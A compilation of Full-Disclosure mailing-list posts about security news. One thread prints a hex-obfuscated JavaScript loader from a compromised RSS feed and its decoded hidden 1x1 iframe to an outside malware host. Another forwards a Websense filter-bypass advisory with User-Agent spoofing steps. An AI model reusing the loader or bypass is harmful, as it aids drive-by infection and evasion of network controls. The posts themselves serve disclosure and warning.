Re: [Full-disclosure] PenTestIT.com RSS feed suspicius
Just got a number of antivirus nastygrams for that last message. My apologies. Not sure if it was my reply or ector's quoted original. But concerning the subject of this thread, I believe if you look at the content of the site there is zero original content to be found. It seems to be an elaborate link farm. FWIW, I remember now the last time I saw that code (in the iframe) was in a spear phishing email. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] PenTestIT.com RSS feed suspicius
De-obfuscates to... document.write('http://innessphoto-dot-com/forum.php?tp=675eafec431b1f72"; width="1" height="1" frameborder="0">') And THAT shit looks even more suspicious. In fact I swear I've seen it before. On Tue, Jul 5, 2011 at 1:31 PM, ector dulac wrote: > #> curl http://feeds.feedburner.com/PenTestIT/ > > ... > > var t="";var > arr="646f63756d656e742e777269746528273c696672616d65207372633d22687474703a2f2f696e6e65737370686f746f2e636f6d2f666f72756d2e7068703f74703d3637356561666563343331623166373077696474683d223122206865696768743d223122206672616d65626f726465723d2230223e3c2f696672616d653e2729";for(i=0;i> Looks suspicious to me > > Ector du Lac > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] not fun but full disclosure
We're busy releasing "feel good" press releases about taking down Conficker and Coreflood! On Thu, Jun 23, 2011 at 9:45 PM, RandallM wrote: > Speak of such.. > > is what LULZ did with AZ over boarder patrol correct? > > why is the security community so quite over this type of work being done.. > > -- > been great, thanks > RandyM > a.k.a System > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Sony: No firewall and no patches
On Mon, May 9, 2011 at 7:03 PM, Thor (Hammer of God) wrote: > Maybe they should call that "You don't have to patch" genius! Lol > > http://www.eweek.com/c/a/Security/Sony-Networks-Lacked-Firewall-Ran-Obsolete-Software-Testimony-103450/ > > Maybe they *DID* call him. https://www.infosecisland.com/blogview/10813-Getting-Off-the-Patch.html ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] iiscan results - a closer look
What's your problem? All the cool kids are doing it! On Tue, Jan 19, 2010 at 7:00 AM, Gregor Schneider wrote: > Hm, wondering if I should allow a China based company to scan any f my > servers > > just my 2 cents... > -- > just because your paranoid, doesn't mean they're not after you... ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] n3td3v's Twitter account hacked
Someone evidently hacked into n3td3v's Twiiter account and is spewing nonsense. http://twitter.com/n3td3v Maybe it's some sort of botnet C&C account now, I dunno. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] RFB standard for ultra VNC Applications
http://en.wikipedia.org/wiki/RFB_protocol Anything less than v3.8 is subject to DoS attacks. Last time I checked, ultraVNC used 3.7. On Fri, Jul 31, 2009 at 10:47 AM, Murthy N Srinivas-B22237 wrote: > Hi > > It seems that RFB standard is being used by ultra VNC Applications. > Is the RFB standard available for public? > > Thanks > -nsmurthy > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Secunia Research: AXIS Camera Control "image_pan_tilt" Property Buffer Overflow
And of course you can find these cameras everywhere using the venerable "inurl:axis-cgi" Google search from days gone by. On 1/23/09, Secunia Research wrote: > == > > Secunia Research 23/01/2009 > >- AXIS Camera Control "image_pan_tilt" Property Buffer Overflow - > > == ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] hash for future reference. please ignore.
75ca3011ae2a15f851cc3334cf7918ae851c92f1 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] FD culture!?
On Sat, Dec 6, 2008 at 1:00 AM, Bipin Gautam <[EMAIL PROTECTED]> wrote: > Guys, > > This mailing list lives up to its name "Full Disclosure" for > tolerating the monkeys and their chattering in this list for quite > some time now without moderation or any action! This mailing list had > a "culture", "the audience base" and that was the "only reason" we all > subscribed to it! > God only knows there's damned little disclosure going on, full or otherwise. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Stop The 70% Lie
http://70percenters.googlepages.com/ "The FBI estimates that about 70 percent of all computer security breaches are perpetrated by insiders." For years this lie and variations on the same theme have been spreading through the Internet and the industry press. Year after year journalists, security marketers, bloggers, and other media types continue to publish this nonsense as though it were the Gospel Truth when the truth is the FBI has never published any survey, study, or statistical analysis that supports this claim. Inspired by http://blogs.zdnet.com/careers/?p=127 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Fwd: Websense 6.3.1 Filtering Bypass
Mr. HinkyDink would like to share the following with the Security Community... -- Forwarded message -- From: <[EMAIL PROTECTED]> Date: Dec 12, 2007 6:05 PM Subject: Websense 6.3.1 Filtering Bypass To: [EMAIL PROTECTED] Please share this with your little friends... -- Websense Policy Filtering Bypass discovered by mrhinkydink PRODUCT: Websense Enterprise 6.3.1 EXPOSURE: Web Filtering Bypass SYNOPSIS By spoofing the User-Agent header it is possible to bypass filtering and, to a lesser extent, monitoring in a Websense Enterprise 6.3.1 environment. PROOF OF CONCEPT The following was tested in an unpatched 6.3.1 system using the ISA Server integration product. It is assumed it will work with other integration products but this has not been tested. Other User Agents may also work. I. Install FireFox 2.0.x II. Obtain and install the User Agent Switcher browser plug-in by Chris Pederick III. Add the following User Agents to the plug-in Description: RealPlayer User Agent : RealPlayer G2 Description: MSN Messenger User Agent : MSMSGS Description: WebEx User Agent : StoneHttpAgent IV. Change FireFox's User Agent to any one of the preceding values V. Browse to a filtered Web site VI. Content is allowed Content browsed via this method will be recorded in the Websense database as being in the "Non-HTTP" category. Demonstration: http://www.youtube.com/watch?v=pKv41ge8XcQ SEE ALSO Websense KnowledgeBase article #976 The vendor acknowledges this behavior in the aforementioned article. WORKAROUND == Disable the protocols mentioned above. VENDOR RESPONSE === Websense has repaired this issue in database #92938 NOTICE == mrhinkydink is not to be confused with the blogger by the same name at www.dailykos.com c. MMVII mrhinkydink ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Websense security contact?
Thanks in advance. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] .NET REMOTING on port 31337
The last time I saw anything on port 31337 (ELEET) it was during a vulnerability assessment. We shut it down and stopped the assessment. Management wouldn't let us investigate, then blew the cover on the assessment a week or two later. It's almost always bad, but you may just have an admin with a stupid sense of humor. 31337 should always throw a red flag. On 9/28/07, Simon Smith <[EMAIL PROTECTED]> wrote: > -BEGIN PGP SIGNED MESSAGE- > Hash: SHA1 > > > Has anyone ever heard of .NET REMOTING running on port 31337? If so, > have you ever seen it "legitimate"? > > > - -- > > - - simon > > - -- > http://www.snosoft.com > > -BEGIN PGP SIGNATURE- > Version: GnuPG v1.4.5 (Darwin) > > iD8DBQFG/Tpqf3Elv1PhzXgRAmOlAKCwOeb3tY1qp8KK/Z4fMYxLOB50nwCcDxCx > Io9uFQH7RLDVdo5QDc36+n4= > =Nz1q > -END PGP SIGNATURE- > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] On the vulnerabilities of web services
On 7/24/07, Fabio Pietrosanti (naif) <[EMAIL PROTECTED]> wrote: > I have no time to write a detailed post on the issues related with the > guys that are recently releasing bugs of web services. > > I would like someone analyze the implications, differences in terms of > community advantages, people risks, technology enhancements related with > the disclosure of vulnerabilities of web services (misc websites of > railways, internet providers, public agencies, search engines and > webmails) VS the disclosure of vulnerabilities in standalone pieces of > software. > > I don't like the public disclosure of XSSs and SQL Injections (and stuff > like that) on third party web sites, i don't consider it useful for > anyone, too risky for the 'researcher' and too risky for the third party > websites. > > Only in July there was a storm of fucking websites vulnerabilities > announcements: > > - http://seclists.org/fulldisclosure/2007/Jul/0457.html TRENITALIA.COM > - http://seclists.org/fulldisclosure/2007/Jul/0460.html STATCOUNTER.COM > - http://seclists.org/fulldisclosure/2007/Jul/0437.html ACTUAL TESTS > - http://seclists.org/fulldisclosure/2007/Jul/0296.html ORKUT > - http://seclists.org/fulldisclosure/2007/Jul/0187.html Wachovia Bank > - http://seclists.org/fulldisclosure/2007/Jul/0035.html blinzzard.com > - http://seclists.org/fulldisclosure/2007/Jul/0036.html WORLDOFWARCRAFT.COM > > Hey guys, do you feel yourself cooler than before, now? > Feel free to edit at will for your own definition... http://en.wikipedia.org/wiki/Full_disclosure "Full disclosure requires that full details of a security vulnerability are disclosed to the public, including details of the vulnerability and how to detect and exploit it. The theory behind full disclosure is that releasing vulnerability information immediately results in quicker fixes and better security. Fixes are produced faster because vendors and authors are forced to respond in order to save face. Security is improved because the window of exposure, the amount of time the vulnerability is open to attack, is reduced. "In the realm of computer vulnerabilities, disclosure is often achieved via mailing lists such as Bugtraq and full disclosure by other means." ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/